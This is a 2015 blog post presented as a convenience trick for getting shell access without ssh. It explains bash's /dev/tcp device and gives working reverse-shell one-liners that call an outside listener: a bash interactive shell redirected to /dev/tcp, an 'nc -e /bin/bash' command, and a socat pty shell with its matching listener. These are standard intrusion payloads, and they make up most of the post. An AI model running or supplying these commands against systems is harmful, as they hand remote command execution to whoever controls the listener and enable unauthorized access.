March 23, 2015 · fun linux bash

Reverse shell is a fun

Need a ssh access, but something going wrong? Read on!

Sometimes I need shell right now, but in some cases it's impossible (no ssh on hosting or something like this).
Happily that bash has built-in network pseudo interface (as a default on most distros) /dev/tcp and /dev/udp. So we can use php, ruby, etc on server to create reverse connection to listener and get shell access.


To use it we need redirect output from /dev/tcp to file or something else.
Simple example:

user@host ~ $ cat < /dev/tcp/

57103 15-03-22 23:54:14 50 0 0 587.5 UTC(NIST) * 

Send http request:

user@host ~ $ exec 3<> /dev/tcp/  
user@host ~ $ echo -e "GET / HTTP/1.1\nHost:\nConnection: close\n\n" >&3  
user@host ~ $ cat <&3  
HTTP/1.1 200 OK  
Server: nginx/1.6.1  
Date: Mon, 23 Mar 2015 00:06:00 GMT  
Content-Type: text/html  
Content-Length: 11517  
Connection: close  
Last-Modified: Tue, 09 Dec 2014 17:40:10 GMT  
ETag: "6587d2-2cfd-509cc08e7aef5"  
Accept-Ranges: bytes  
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""  

A little bit different from previous. As we need to send data first, we need create file descriptor 3 for reading and writing and bind it to /dev/tcp/address/port:

exec 3<> /dev/tcp/  

Beautiful article about redirections is here
Next, create HTTP request header and write it to file descriptor 3 to send it:

echo -e "GET / HTTP/1.1\nHost:\nConnection: close\n\n" >&3  

And last, read a response.

cat <&3  

Now, let's got a bash over tcp
/dev/tcp can only connect to other addresses, so netcat or socat needed on listener. Create a listener:

user@listener ~: nc -l -p 1413

And connect to it from target:

user@target ~ $ /bin/bash -c "/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1"  

Done, now we have remote shell with bash only

user@listener ~: nc -l -p 1413  
user@target ~ $ 

In this example bash in interactive mode

/bin/bash -i

(bash will source ~/.bashrc or default bash config file, so we get a little bit nicer shell) send all it stdout to listener,

/bin/bash -i > /dev/tcp/listener_address/1413

and all what will be send from listener will be executed in bash and redirected back to listener (stderr is also redirected, this is important)

/bin/bash -i > /dev/tcp/listener_address/1413 0>&1 2>&1

More elegant:

/bin/bash -c "bash -i &> /dev/tcp/listener_address/1413 0>&1"

&> or >& will redirect both stderr and stdout to specified address.

Sure, netcat with '-e' parameter can be used to execute bash:

user@target ~ $ nc listener_address 1413 -e '/bin/bash'  

But there is some problem.
Key shortcuts, ncurces-based programs will not work correctly. We need more tty access now, and it's a Socat time!

Socat it's like a netcat, but with extremely powerfull features (may be downloaded from here for Linux or here for FreeBSD, both statically linked)
Create a listener:

user@listener ~: socat -,raw,echo=0 tcp-listen:1413  

And connect from target:

user@target ~ $ socat tcp:listener_address:1413 exec:"bash -i",pty,stderr,setsid,sigint,sane  

Now we can play ninvaders, use htop, mc, vim and any other cli stuff :)

PS: don't forget to adjust terminal size after getting reverse bash.
See actual:


and export after got shell:

export LINES=53;export COLUMNS=159  

All for now.

Want more?
Socat man and examples page


  • LinkedIn
  • Tumblr
  • Reddit
  • Google+
  • Pinterest
  • Pocket
Comments powered by Disqus